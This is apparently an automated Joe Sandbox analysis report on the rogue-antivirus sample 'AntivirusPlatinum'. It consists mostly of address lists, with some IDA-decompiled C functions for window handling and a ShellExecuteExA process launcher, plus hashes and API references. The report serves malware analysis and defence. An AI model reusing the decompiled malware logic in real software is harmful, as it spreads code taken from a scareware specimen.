                                                                                                                                                      0x004044d9
                                                                                                                                                      0x004044db
                                                                                                                                                      0x00404504
                                                                                                                                                      0x00404516
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404516
                                                                                                                                                      0x004044dd
                                                                                                                                                      0x004044eb
                                                                                                                                                      0x004044ed
                                                                                                                                                      0x004044f2
                                                                                                                                                      0x004044f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004044fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004044fc
                                                                                                                                                      0x00404502
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404502
                                                                                                                                                      0x004044df
                                                                                                                                                      0x004044e9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004044e9
                                                                                                                                                      0x004044d1
                                                                                                                                                      0x004044d7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004044d7
                                                                                                                                                      0x004044a8
                                                                                                                                                      0x0040436b
                                                                                                                                                      0x0040436d
                                                                                                                                                      0x0040436f
                                                                                                                                                      0x0040437f
                                                                                                                                                      0x00404383
                                                                                                                                                      0x00404387
                                                                                                                                                      0x0040438b
                                                                                                                                                      0x00404390
                                                                                                                                                      0x00404392
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404394
                                                                                                                                                      0x0040420b
                                                                                                                                                      0x00404211
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404216
                                                                                                                                                      0x0040425b
                                                                                                                                                      0x0040425d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040428d
                                                                                                                                                      0x00404292
                                                                                                                                                      0x00404294
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040429a
                                                                                                                                                      0x0040429d
                                                                                                                                                      0x004042a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004042b2
                                                                                                                                                      0x004042b9
                                                                                                                                                      0x004042be
                                                                                                                                                      0x004042c6
                                                                                                                                                      0x004042cb
                                                                                                                                                      0x004042cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004042dd
                                                                                                                                                      0x004042e1
                                                                                                                                                      0x004042e2
                                                                                                                                                      0x004042f8
                                                                                                                                                      0x00404302
                                                                                                                                                      0x0040430e
                                                                                                                                                      0x0040433c
                                                                                                                                                      0x00404341
                                                                                                                                                      0x00404343
                                                                                                                                                      0x00404352
                                                                                                                                                      0x00404357
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404357
                                                                                                                                                      0x00404345
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404247
                                                                                                                                                      0x00404247
                                                                                                                                                      0x0040424b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040424b
                                                                                                                                                      0x00404245
                                                                                                                                                      0x00404072
                                                                                                                                                      0x00404076
                                                                                                                                                      0x0040421d
                                                                                                                                                      0x00404223
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404223
                                                                                                                                                      0x0040407c
                                                                                                                                                      0x00404080
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404086
                                                                                                                                                      0x0040408a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404090
                                                                                                                                                      0x00404097
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040409d
                                                                                                                                                      0x004040a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004040a7
                                                                                                                                                      0x004040ad
                                                                                                                                                      0x004040b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004040ba
                                                                                                                                                      0x004040d9
                                                                                                                                                      0x004040db
                                                                                                                                                      0x00404186
                                                                                                                                                      0x00404186
                                                                                                                                                      0x004041bc
                                                                                                                                                      0x004041bc
                                                                                                                                                      0x004041c3
                                                                                                                                                      0x004041cd
                                                                                                                                                      0x004041e0
                                                                                                                                                      0x004041f9
                                                                                                                                                      0x004041fb
                                                                                                                                                      0x00404204
                                                                                                                                                      0x00404204
                                                                                                                                                      0x00404209
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404209
                                                                                                                                                      0x004040e7
                                                                                                                                                      0x004040ec
                                                                                                                                                      0x004040ef
                                                                                                                                                      0x004040f1
                                                                                                                                                      0x004040ff
                                                                                                                                                      0x00404104
                                                                                                                                                      0x00404106
                                                                                                                                                      0x0040412d
                                                                                                                                                      0x00404132
                                                                                                                                                      0x00404132
                                                                                                                                                      0x00404106
                                                                                                                                                      0x0040413e
                                                                                                                                                      0x00404143
                                                                                                                                                      0x0040415d
                                                                                                                                                      0x00404162
                                                                                                                                                      0x00404164
                                                                                                                                                      0x00404166
                                                                                                                                                      0x0040416a
                                                                                                                                                      0x004041ab
                                                                                                                                                      0x004041b7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004041b7
                                                                                                                                                      0x0040416c
                                                                                                                                                      0x00404173
                                                                                                                                                      0x00404181
                                                                                                                                                      0x00404181
                                                                                                                                                      0x00404173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404164
                                                                                                                                                      0x0040405d
                                                                                                                                                      0x00403fdd
                                                                                                                                                      0x00403fdd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403fdd
                                                                                                                                                      0x00403fb2
                                                                                                                                                      0x00403fb7
                                                                                                                                                      0x00403fb9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403fbb
                                                                                                                                                      0x00403fc2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403fd0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403fd0
                                                                                                                                                      0x00403f7c
                                                                                                                                                      0x00403f80
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403f80
                                                                                                                                                      0x00403f6d
                                                                                                                                                      0x00403f74
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403f74
                                                                                                                                                      0x00403f53
                                                                                                                                                      0x00403f5a
                                                                                                                                                      0x00403f5e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403f5e
                                                                                                                                                      0x00403ea5
                                                                                                                                                      0x00403eab
                                                                                                                                                      0x00403eaf
                                                                                                                                                      0x00403ed3
                                                                                                                                                      0x00403eb1
                                                                                                                                                      0x00403eb9
                                                                                                                                                      0x00403eb9
                                                                                                                                                      0x00403ed8
                                                                                                                                                      0x00403edc
                                                                                                                                                      0x00403ede
                                                                                                                                                      0x00403ee0
                                                                                                                                                      0x00403ee0
                                                                                                                                                      0x00403ee7
                                                                                                                                                      0x00403eeb
                                                                                                                                                      0x00403efe
                                                                                                                                                      0x00403f05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403eed
                                                                                                                                                      0x00403eed
                                                                                                                                                      0x00403ef4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403ef6
                                                                                                                                                      0x00403f0a
                                                                                                                                                      0x00403f12
                                                                                                                                                      0x00403f17
                                                                                                                                                      0x00403f1b
                                                                                                                                                      0x00403f1d
                                                                                                                                                      0x00403f25
                                                                                                                                                      0x00403f2f
                                                                                                                                                      0x00403f34
                                                                                                                                                      0x00403f36
                                                                                                                                                      0x00403f3a
                                                                                                                                                      0x00403f3b
                                                                                                                                                      0x00403f3b
                                                                                                                                                      0x00403f36
                                                                                                                                                      0x00403f25
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403f1b
                                                                                                                                                      0x00403eeb
                                                                                                                                                      0x00403e30
                                                                                                                                                      0x00403e37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e39
                                                                                                                                                      0x00403e39
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e39
                                                                                                                                                      0x00403e37
                                                                                                                                                      0x00403e0f
                                                                                                                                                      0x00403e13
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e17
                                                                                                                                                      0x00403e1c
                                                                                                                                                      0x00403e1e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e20
                                                                                                                                                      0x00403e23
                                                                                                                                                      0x00403e27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e27
                                                                                                                                                      0x00403e1e
                                                                                                                                                      0x00403da3
                                                                                                                                                      0x00403da9
                                                                                                                                                      0x00403dac
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403dbd
                                                                                                                                                      0x00403dc2
                                                                                                                                                      0x00403dc4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403dc6
                                                                                                                                                      0x00403dc6
                                                                                                                                                      0x00403dc8
                                                                                                                                                      0x00403ddd
                                                                                                                                                      0x00403de4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403de4
                                                                                                                                                      0x00403dc4
                                                                                                                                                      0x00403d58
                                                                                                                                                      0x00403d5e
                                                                                                                                                      0x00403d61
                                                                                                                                                      0x00403d63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403d63
                                                                                                                                                      0x00403cf8
                                                                                                                                                      0x00403cff
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403d01
                                                                                                                                                      0x00403d01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403d01
                                                                                                                                                      0x00403c9e
                                                                                                                                                      0x00403ca4
                                                                                                                                                      0x00403ca7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403ca9
                                                                                                                                                      0x00403cad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403caf
                                                                                                                                                      0x00403caf
                                                                                                                                                      0x00403cb1
                                                                                                                                                      0x00403cb3
                                                                                                                                                      0x00403cb3
                                                                                                                                                      0x00403cc6
                                                                                                                                                      0x00403cd2
                                                                                                                                                      0x00403cd4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403cd6
                                                                                                                                                      0x00403ce6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403ce6
                                                                                                                                                      0x00403cd4
                                                                                                                                                      0x00403cad
                                                                                                                                                      0x00403bf8
                                                                                                                                                      0x00403bfd
                                                                                                                                                      0x00403c01
                                                                                                                                                      0x00403c03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403c03
                                                                                                                                                      0x00403b73
                                                                                                                                                      0x00403b7f
                                                                                                                                                      0x00403b82
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b84
                                                                                                                                                      0x00403b8b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b8b
                                                                                                                                                      0x00403aa5
                                                                                                                                                      0x00403aa8
                                                                                                                                                      0x00403aaf
                                                                                                                                                      0x00403aaf
                                                                                                                                                      0x00403ab6
                                                                                                                                                      0x00403ab6
                                                                                                                                                      0x00403ab9
                                                                                                                                                      0x00403b01
                                                                                                                                                      0x00403b01
                                                                                                                                                      0x00403b04
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b06
                                                                                                                                                      0x00403b0d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b1d
                                                                                                                                                      0x00403b22
                                                                                                                                                      0x00403b24
                                                                                                                                                      0x00403a7b
                                                                                                                                                      0x00403a82
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b2a
                                                                                                                                                      0x00403b2c
                                                                                                                                                      0x00403b41
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403b41
                                                                                                                                                      0x00403abb
                                                                                                                                                      0x00403ac7
                                                                                                                                                      0x00403acc
                                                                                                                                                      0x00403ace
                                                                                                                                                      0x00403ad0
                                                                                                                                                      0x00403ad0
                                                                                                                                                      0x00403ad7
                                                                                                                                                      0x00403ade
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403ae0
                                                                                                                                                      0x00403aeb
                                                                                                                                                      0x00403aed
                                                                                                                                                      0x00403af9
                                                                                                                                                      0x00403afe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403afe
                                                                                                                                                      0x00403ade
                                                                                                                                                      0x00403ab9
                                                                                                                                                      0x00403aaa
                                                                                                                                                      0x00403aad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403aad
                                                                                                                                                      0x00403a62
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403a79
                                                                                                                                                      0x00403a8c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403a8c
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char
                                                                                                                                                      • String ID: E$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA
                                                                                                                                                      • API String ID: 751630497-346517416
                                                                                                                                                      • Opcode ID: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                      • Instruction ID: 3a254fb49c50d1bdf513d271921d20743245357351c521a06279862033cd8a45
                                                                                                                                                      • Opcode Fuzzy Hash: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                      • Instruction Fuzzy Hash: 298238B0904684ADDF25DF70C844BEBBBA9AF01304F0441BBFA99761C2D77D6A84CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AD46(char _a4, long _a8) {
                                                                                                                                                      				struct HWND__* _v8;
                                                                                                                                                      				char _v43;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				signed int _v60;
                                                                                                                                                      				int _v64;
                                                                                                                                                      				void* _v68;
                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                      				struct HWND__* _t49;
                                                                                                                                                      
                                                                                                                                                      				_t49 = GetDlgItem( *0x419f80, 0x67);
                                                                                                                                                      				_v8 = _t49;
                                                                                                                                                      				if( *0x41a814 == 0) {
                                                                                                                                                      					_t48 =  *0x418ecc; // 0x0
                                                                                                                                                      					E0040649C(_t48);
                                                                                                                                                      					ShowWindow(_t49, 5); // executed
                                                                                                                                                      					SendMessageA(_t49, 0xb1, 0, 0xffffffff);
                                                                                                                                                      					SendMessageA(_t49, 0xc2, 0, 0x41259a);
                                                                                                                                                      					 *0x41a814 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                      				_v68 = 0x3c;
                                                                                                                                                      				SendMessageA(_v8, 0x43a, 0,  &_v68);
                                                                                                                                                      				_v43 = 0;
                                                                                                                                                      				_v64 = 1;
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_v60 = _v60 & 0xbfffffff | 1;
                                                                                                                                                      					_v48 = 0xa0;
                                                                                                                                                      					_v64 = 0x40000001;
                                                                                                                                                      				}
                                                                                                                                                      				SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                      				SendMessageA(_v8, 0xc2, 0, _a8);
                                                                                                                                                      				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_v60 = _v60 & 0xfffffffe | 0x40000000;
                                                                                                                                                      					SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                      				}
                                                                                                                                                      				return SendMessageA(_v8, 0xc2, 0, "\r\n");
                                                                                                                                                      			}











                                                                                                                                                      0x0040ad6a
                                                                                                                                                      0x0040ad6c
                                                                                                                                                      0x0040ad74
                                                                                                                                                      0x0040ad76
                                                                                                                                                      0x0040ad7c
                                                                                                                                                      0x0040ad84
                                                                                                                                                      0x0040ad90
                                                                                                                                                      0x0040ad9f
                                                                                                                                                      0x0040ada1
                                                                                                                                                      0x0040ada1
                                                                                                                                                      0x0040adb3
                                                                                                                                                      0x0040adc3
                                                                                                                                                      0x0040adca
                                                                                                                                                      0x0040add3
                                                                                                                                                      0x0040add7
                                                                                                                                                      0x0040adda
                                                                                                                                                      0x0040ade7
                                                                                                                                                      0x0040adea
                                                                                                                                                      0x0040adf1
                                                                                                                                                      0x0040adf1
                                                                                                                                                      0x0040ae05
                                                                                                                                                      0x0040ae14
                                                                                                                                                      0x0040ae1c
                                                                                                                                                      0x0040ae22
                                                                                                                                                      0x0040ae2f
                                                                                                                                                      0x0040ae40
                                                                                                                                                      0x0040ae40
                                                                                                                                                      0x0040ae57

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AD90
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AD9F
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADB3
                                                                                                                                                      • SendMessageA.USER32 ref: 0040ADCA
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE05
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE14
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE1C
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE40
                                                                                                                                                      • SendMessageA.USER32 ref: 0040AE51
                                                                                                                                                        • Part of subcall function 0040649C: DestroyWindow.USER32(?,7490B980,0040AD81), ref: 004064A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$DestroyItemShow
                                                                                                                                                      • String ID: <
                                                                                                                                                      • API String ID: 2996232536-4251816714
                                                                                                                                                      • Opcode ID: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                      • Instruction ID: 084cac9118b8bafa9f7e2012358cdd00eacd402f5ccca60df93bcffea555cbd4
                                                                                                                                                      • Opcode Fuzzy Hash: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                      • Instruction Fuzzy Hash: 1F318071E40218BAEB119BA4DC4AFEE7F79EB81754F148129F201BA1E0C7B51E10DB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 767 40bd80-40bd97 call 40a384 770 40bf94-40bf96 767->770 771 40bd9d-40bdbe call 40a289 767->771 774 40bdc0-40bdc6 771->774 775 40bdc8 771->775 776 40bdcb-40bdcf 774->776 775->776 777 40be10-40be13 776->777 778 40bdd1 776->778 779 40be24-40be38 call 407690 777->779 780 40be15-40be1b 777->780 781 40bdd3-40bdd6 778->781 792 40be50-40be5e call 405767 779->792 793 40be3a-40be47 call 40a59a 779->793 780->779 782 40be1d 780->782 784 40bdd8 781->784 785 40bdec-40bdf0 781->785 782->779 787 40bde0-40bde4 784->787 788 40bdf2-40bdf7 785->788 789 40be03-40be08 785->789 794 40bde6 787->794 795 40bdda-40bdde 787->795 788->789 796 40bdf9-40bdff 788->796 790 40be0a 789->790 791 40be0c-40be0d 789->791 790->791 791->777 803 40be60-40be75 call 405822 792->803 804 40be78-40be7b 792->804 793->792 805 40be49 793->805 794->785 795->787 797 40bde8 795->797 796->781 800 40be01 796->800 797->785 800->777 803->804 807 40beb7-40beca ShellExecuteExA 804->807 808 40be7d-40be80 804->808 805->792 811 40bee9-40bef8 807->811 812 40becc-40bee3 ShellExecuteExA 807->812 808->807 810 40be82-40beb1 call 40a477 call 40a5e2 call 405767 808->810 810->807 814 40bf92-40bf93 810->814 815 40befa-40befd 811->815 816 40beff-40bf06 811->816 812->811 812->814 814->770 815->816 817 40bf36-40bf42 CloseHandle 815->817 818 40bf20-40bf31 WaitForInputIdle call 40b6ea 816->818 819 40bf08-40bf11 IsWindowVisible 816->819 823 40bf44-40bf53 call 40a59a 817->823 824 40bf55-40bf5b 817->824 818->817 819->818 821 40bf13-40bf1c ShowWindow 819->821 821->818 823->824 834 40bf83-40bf86 823->834 828 40bf69-40bf7c 824->828 829 40bf5d-40bf60 824->829 833 40bf7d Sleep 828->833 829->828 832 40bf62-40bf67 829->832 832->833 833->834 834->814 836 40bf88-40bf90 ShowWindow 834->836 836->814
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BD80(char* __eax, void* __ecx, long _a4) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct _SHELLEXECUTEINFOA _v72;
                                                                                                                                                      				char _v1096;
                                                                                                                                                      				char _v2120;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				intOrPtr _t60;
                                                                                                                                                      				char _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				struct HWND__* _t65;
                                                                                                                                                      				long _t68;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				char* _t86;
                                                                                                                                                      				long _t87;
                                                                                                                                                      				char _t93;
                                                                                                                                                      				char* _t94;
                                                                                                                                                      				long _t96;
                                                                                                                                                      				char* _t99;
                                                                                                                                                      				intOrPtr _t121;
                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                      
                                                                                                                                                      				_t99 = __eax;
                                                                                                                                                      				_t56 = E0040A384(__ecx, __eax);
                                                                                                                                                      				if(_t56 >= 0x3f6) {
                                                                                                                                                      					return _t56;
                                                                                                                                                      				}
                                                                                                                                                      				_t96 = 0x3c;
                                                                                                                                                      				E0040A289(__ecx,  &_v72, 0, _t96);
                                                                                                                                                      				_t93 =  *_t99;
                                                                                                                                                      				_v72.cbSize = _t96;
                                                                                                                                                      				_v72.fMask = 0x5c0;
                                                                                                                                                      				if(_t93 != 0x22) {
                                                                                                                                                      					_v72.lpFile = _t99;
                                                                                                                                                      				} else {
                                                                                                                                                      					_v72.lpFile = _t99 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t59 = 0;
                                                                                                                                                      				if(_t93 == 0) {
                                                                                                                                                      					L19:
                                                                                                                                                      					if(_a4 == 0 &&  *0x41a392 != 0) {
                                                                                                                                                      						_v72.lpParameters = 0x41a392;
                                                                                                                                                      					}
                                                                                                                                                      					_v72.nShow = 1;
                                                                                                                                                      					_t60 = E00407690(_v72.lpFile);
                                                                                                                                                      					_v12 = _t60;
                                                                                                                                                      					if(_t60 != 0) {
                                                                                                                                                      						_t85 = E0040A59A(_t60, ".inf");
                                                                                                                                                      						_t112 = _t85;
                                                                                                                                                      						if(_t85 == 0) {
                                                                                                                                                      							_v72.lpVerb = "Install";
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t61 = E00405767(_t112, _v72.lpFile, 0);
                                                                                                                                                      					_v5 = _t61;
                                                                                                                                                      					if(_t61 != 0) {
                                                                                                                                                      						E00405822(_v72.lpFile,  &_v2120);
                                                                                                                                                      						_v72.lpFile =  &_v2120;
                                                                                                                                                      					}
                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                      						L30:
                                                                                                                                                      						_t63 = ShellExecuteExA( &_v72); // executed
                                                                                                                                                      						if((_t63 & 0xffffff00 | _t63 != 0x00000000) != 0) {
                                                                                                                                                      							L32:
                                                                                                                                                      							_v5 = 0;
                                                                                                                                                      							_t121 =  *0x419f88; // 0x0
                                                                                                                                                      							if(_t121 != 0 || _a4 != 0) {
                                                                                                                                                      								_t65 =  *0x419f80; // 0x0
                                                                                                                                                      								if(_t65 != 0 && IsWindowVisible(_t65) != 0) {
                                                                                                                                                      									ShowWindow( *0x419f80, 0);
                                                                                                                                                      									_v5 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								WaitForInputIdle(_v72.hProcess, 0x7d0);
                                                                                                                                                      								E0040B6EA(_v72.hProcess);
                                                                                                                                                      							}
                                                                                                                                                      							_t68 = CloseHandle(_v72.hProcess);
                                                                                                                                                      							if(_v12 == 0) {
                                                                                                                                                      								L40:
                                                                                                                                                      								_t127 =  *0x419f88; // 0x0
                                                                                                                                                      								if(_t127 == 0 || _a4 != 0) {
                                                                                                                                                      									__eflags = _a4;
                                                                                                                                                      									_t68 = ((0 | _a4 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                                                                                      									__eflags = _t68;
                                                                                                                                                      									Sleep(_t68);
                                                                                                                                                      								} else {
                                                                                                                                                      									Sleep(0x1b58);
                                                                                                                                                      								}
                                                                                                                                                      								goto L45;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t68 = E0040A59A(_v12, ".exe");
                                                                                                                                                      								if(_t68 == 0) {
                                                                                                                                                      									L45:
                                                                                                                                                      									if(_v5 != 0) {
                                                                                                                                                      										_t68 = ShowWindow( *0x419f80, 1);
                                                                                                                                                      									}
                                                                                                                                                      									goto L47;
                                                                                                                                                      								}
                                                                                                                                                      								goto L40;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v72.fMask = _v72.fMask & 0xfffffbff;
                                                                                                                                                      						_v72.lpFile = _t99;
                                                                                                                                                      						_t68 = ShellExecuteExA( &_v72) & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                      							goto L47;
                                                                                                                                                      						}
                                                                                                                                                      						goto L32;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t115 = _v5;
                                                                                                                                                      						if(_v5 != 0) {
                                                                                                                                                      							goto L30;
                                                                                                                                                      						}
                                                                                                                                                      						E0040A477( &_v1096, _v72.lpFile);
                                                                                                                                                      						E0040A5E2( &_v1096, ".exe");
                                                                                                                                                      						_t68 = E00405767(_t115,  &_v1096, 0);
                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                      							L47:
                                                                                                                                                      							return _t68;
                                                                                                                                                      						}
                                                                                                                                                      						goto L30;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t94 = _t99;
                                                                                                                                                      					do {
                                                                                                                                                      						if( *_t94 != 0x22) {
                                                                                                                                                      							L12:
                                                                                                                                                      							if( *((char*)(_t59 + _t99)) == 0x20 ||  *((char*)(_t59 + _t99 + 1)) == 0x2f) {
                                                                                                                                                      								_t86 = _t59 + _t99;
                                                                                                                                                      								__eflags =  *_t86 - 0x20;
                                                                                                                                                      								if( *_t86 == 0x20) {
                                                                                                                                                      									 *_t86 = 0;
                                                                                                                                                      								}
                                                                                                                                                      								_t87 = _t86 + 1;
                                                                                                                                                      								__eflags = _t87;
                                                                                                                                                      								_v72.lpParameters = _t87;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L14;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                      							if( *((intOrPtr*)(_t59 + _t99)) == 0) {
                                                                                                                                                      								break;
                                                                                                                                                      							}
